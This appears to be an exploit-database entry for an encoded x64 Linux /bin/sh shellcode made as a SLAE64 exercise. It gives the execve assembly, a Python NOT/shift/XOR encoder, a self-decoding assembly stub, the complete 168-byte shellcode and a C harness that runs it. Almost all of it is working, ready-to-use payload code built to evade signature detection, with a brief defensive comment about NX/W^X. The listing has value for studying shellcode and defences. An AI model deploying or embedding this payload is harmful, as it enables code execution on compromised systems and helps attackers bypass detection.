
Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)

🗓️ 29 Jul 2019 00:00:00Reported by Pedro CabralType 

X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh shellcode by Pedro Cabral for x64 Ubuntu 16.04.6 LTS, 168 bytes

/*
######################################## description ########################################

; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
; Author    : Pedro Cabral
; Twitter   : @CabrallPedro
; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
; SLAE ID   : SLAE64 - 1603
; Purpose   : spawn /bin/sh shell
; Tested On : Ubuntu 16.04.6 LTS
; Arch      : x64
; Size      : 168 bytes

########################################## sh.asm ###########################################

global _start

section .text

_start:
        xor rax, rax
        push rax ; push null
        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
        push rbx ; push to the stack
        mov rdi, rsp ; store the /bin//sh on rdi
        push rax ; push null
        mov rdx, rsp ; set rdx
        push rdi ; push the address of /bin//sh
        mov rsi, rsp ; set rsi
        add rax, 59 ; rax = 59 (execve)
        syscall


#################################### original shellcode #####################################

pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
pedro@ubuntu>ld -N -o sh sh.o
pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"


########################################  encode.py  ########################################

#!/usr/bin/python

import sys

if len(sys.argv) != 3:
        print "Usage : python encode.py <SHIFT number> <XOR number>"
        sys.exit(0)

shift   = int(sys.argv[1])
xor     = int(sys.argv[2])

shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")


# prepend the SHIFT and XOR values to the start of the shellcode
encoded_shellcode =""
encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
encoded_shellcode += '%02x, ' %shift
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor

# [NOT + SHL-N + XOR-N] encoded shellcode
for i in bytearray(shellcode):
	new = ~i & 0xff
	new = new << shift
        new = new ^ xor
        encoded_shellcode += '0x'
        encoded_shellcode += '%02x, ' %new

# end of shellcode
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x' %xor

# print encoded shellcode
print encoded_shellcode

#################################### Encoded Shellcode  #####################################

pedro@ubuntu>python encoder.py 4 1337
0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

####################################### decoder.asm  ########################################

global _start

section .text

_start:

	jmp decoder
	encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

decoder:
	lea rsi, [rel encoded]

	xor rcx, rcx
	xor r9,r9
	xor r10,r10

	mov word cx, [rsi]
	inc rsi
	inc rsi
	mov word r9w, [rsi]
	inc rsi
	inc rsi
	push rsi
	mov rdi, rsi
main: ; 			to deal with 0xff on the original shellcode
	mov word r10w,[rsi]
	xor r10w, r9w
	jz second_check
main2:
	shr r10, cl
	not word r10w
	mov byte [rdi], r10b
	inc rsi
	inc rsi
	inc rdi
	jmp short main

second_check:
	mov word r10w, [rsi+2]
	xor r10w, r9w
	jz call_encoded
	mov word r10w, [rsi]
	xor r10w, r9w
	jmp main2

call_encoded:
	call [rsp]

###################################### final shellcode ######################################

pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"

pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
pedro@ubuntu>./testShellcode 
Shellcode Length:	168
$ whoami
pedro
*/


#include<stdio.h>
#include<string.h>


unsigned char code[] = \
"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";

/*
 * Test harness: prints strlen(code) and then transfers control into the
 * byte array `code` defined above.
 *
 * Notes for anyone reproducing or analysing this sample:
 *  - strlen() stops at the first 0x00 byte, so the printed length is only
 *    meaningful because the encoding scheme keeps NUL bytes out of the
 *    payload (see the 0x01 prefix in encode.py); a stray NUL would silently
 *    report a shorter length.
 *  - `code` is a writable global (.data). The decoder stub writes the
 *    decoded bytes back over the same buffer in place (decoder.asm,
 *    `mov byte [rdi], r10b`), so the mapping has to be both writable and
 *    executable. The build line in the header uses `-z execstack`; on the
 *    tested system that presumably is what makes the jump below succeed.
 *    With NX / W^X enforced this call faults, which is the mitigation a
 *    defender relies on against self-decoding payloads of this kind.
 *  - Casting a data pointer to a function pointer is undefined behaviour in
 *    ISO C; it is tolerated here only because running the bytes is the whole
 *    point of the harness.
 *  - NOTE(review): `void main()` is non-standard; `int main(void)` is the
 *    conforming signature. Left unchanged to keep the listing as published.
 */
void main(){
	printf("Shellcode Length:	%zu\n",strlen(code));

	int (*ret)() = (int(*)())code;	/* reinterpret the byte array as code and jump into it */

	ret();

}
